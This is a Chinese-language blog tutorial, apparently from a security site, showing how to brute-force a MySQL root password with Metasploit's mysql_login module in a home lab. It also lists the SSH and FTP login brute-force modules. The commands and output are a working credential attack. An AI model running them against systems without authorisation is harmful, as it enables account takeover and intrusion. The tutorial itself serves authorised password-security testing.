Metasploit之口令安全

颓废 2019年5月19日10:17:14评论437 views字数 1393阅读4分38秒阅读模式

Metasploit之口令安全

这里测试的是MySQL数据库的口令安全

首先,我们的靶机上需要开启MySQL数据库(破解本地才需要这样)

回想:当初启动ssh的命令:service ssh start,那么启动MySQL:service mysql start
同理:查看相关命令启动状态:service ssh ststus,MySQL查看状态:service mysql ststus
得到:Active: active (running),即证明开启成功

------------------------------------------------------------------------------------------------
远程MySQL爆破步骤:

metasploit下进行操作

search mysql_login        -->搜索相关MySQL登陆的模块,得到auxiliary/scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login    -->使用这个模块

show options              -->查看配置选项,这里的选项比较多,逐一解释

PASSWORD,设置密码;PASS_FILE,设置密码文件;USERNAME,设置账户;USERPASS_FILE,设置账户文件

set RHOSTS 192.168.2.149    -->设置目标主机IP

set USERNAME root         -->设置爆破的账户为root

set PASS_FILE /root/1.txt    -->设置爆破密码文本

set THREADS 10           -->设置线程数

show options             -->最后查看我们的设置成功没有

exploit                  -->开始运行攻击破解MySQL密码

PS:这里我是kali-linux2.0去破解我的Windows2003的MySQL出了点错误
回显:版不支持mysql 3306目标检测

我又重新设置了目标IP

set RHOSTS 127.0.0.1    -->设置攻击对象为本地的MySQL数据库,之前启动过MySQL的服务的

exploit                 -->开始运行攻击破解MySQL密码

回显:[+] 127.0.0.1:3306        - MYSQL - Success: 'root:'
PS:成功爆破,账号root,密码空

------------------------------------------------------------------------------------------------
PS:kali-linux连接MySQL命令

mysql -u root -p    -->连接MySQL,回显:Enter password:(输入密码,我的本地为空,直接回车)

本章节同样的道理

search ssh_login    -->搜索ssh的登陆爆破模块
auxiliary/scanner/ssh/ssh_login           -->ssh登陆口令
auxiliary/scanner/ssh/ssh_login_pubkey    -->ssh登陆的公共密匙

search ftp_login    -->搜索FTP的登陆爆破模块
auxiliary/scanner/ftp/ftp_login           -->FTP登陆口令

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:17:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之口令安全http://cn-sec.com/archives/67384.html

发表评论

匿名网友 填写信息